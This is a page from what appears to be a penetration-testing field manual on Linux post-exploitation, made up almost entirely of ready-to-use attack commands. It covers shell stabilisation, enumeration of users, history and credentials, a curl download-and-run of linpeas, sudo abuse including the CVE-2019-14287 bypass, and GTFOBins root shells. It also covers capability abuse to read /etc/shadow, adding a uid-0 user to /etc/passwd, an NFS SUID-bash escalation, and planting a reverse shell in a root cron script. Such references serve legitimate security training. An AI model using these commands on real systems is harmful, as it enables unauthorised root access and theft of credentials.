> For the complete documentation index, see [llms.txt](https://rouxtronics.gitbook.io/stemsecure/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rouxtronics.gitbook.io/stemsecure/field-manual/03-post-exploitation-linux.md).

# 03 - Post-Exploitation: Linux

## Shell Stabilization

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z -> stty raw -echo; fg -> Enter x2
export TERM=xterm; stty rows 50 cols 220
```

## Situational Awareness

| Command                                   | Purpose                |
| ----------------------------------------- | ---------------------- |
| `id; whoami; groups`                      | Current user & groups  |
| `hostname; uname -a; cat /etc/os-release` | System info            |
| `ip a; ip r; cat /etc/hosts`              | Network config         |
| `ps aux`                                  | Running processes      |
| `ss -tlnp` / `netstat -tlnp`              | Open ports / listeners |
| `cat /etc/passwd \| grep -v nologin`      | Valid shell users      |
| `env; export`                             | Environment variables  |
| `find / -name '*.conf' 2>/dev/null`       | Config files           |
| `history; cat ~/.bash_history`            | Command history        |

## Privilege Escalation

**Automated enumeration**

```
curl -o linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh | tee linpeas.out
```

**SUID/SGID**

```
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
```

Cross-reference every hit against [GTFOBins](https://gtfobins.github.io).

**Sudo abuse**

```
sudo -l
sudo -u#-1 /bin/bash          # CVE-2019-14287 bypass
```

| Sudo entry                         | Exploit                                               |
| ---------------------------------- | ----------------------------------------------------- |
| `(ALL) NOPASSWD: /usr/bin/vim`     | `sudo vim -c ':!/bin/bash'`                           |
| `(ALL) NOPASSWD: /usr/bin/find`    | `sudo find . -exec /bin/bash \; -quit`                |
| `(ALL) NOPASSWD: /usr/bin/python3` | `sudo python3 -c 'import os; os.system("/bin/bash")'` |
| `(ALL) NOPASSWD: /usr/bin/less`    | `sudo less /etc/passwd` → `!bash`                     |

**Cron jobs**

```
cat /etc/crontab; ls -la /etc/cron*
find / -name 'cron*' 2>/dev/null
```

Look for a writable script called by root's cron and drop a reverse shell into it.

**Capabilities**

```
getcap -r / 2>/dev/null
```

| Capability                   | Exploit                                                        |
| ---------------------------- | -------------------------------------------------------------- |
| `cap_setuid+ep` on python3   | `python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'` |
| `cap_net_raw+ep` on tcpdump  | `tcpdump -i eth0 -w /tmp/cap.pcap`                             |
| `cap_dac_read_search` on vim | `vim /etc/shadow`                                              |

**Writable `/etc/passwd`**

```
openssl passwd -1 -salt hax 'password123'
echo 'haxroot:$1$hax$...:0:0:root:/root:/bin/bash' >> /etc/passwd
su haxroot
```

**NFS no\_root\_squash**

```
cat /etc/exports              # look for no_root_squash
showmount -e $TARGET
mount -t nfs $TARGET:/share /mnt/nfs -o nolock
cp /bin/bash /mnt/nfs/bash && chmod +s /mnt/nfs/bash
/mnt/nfs/bash -p               # on target
```
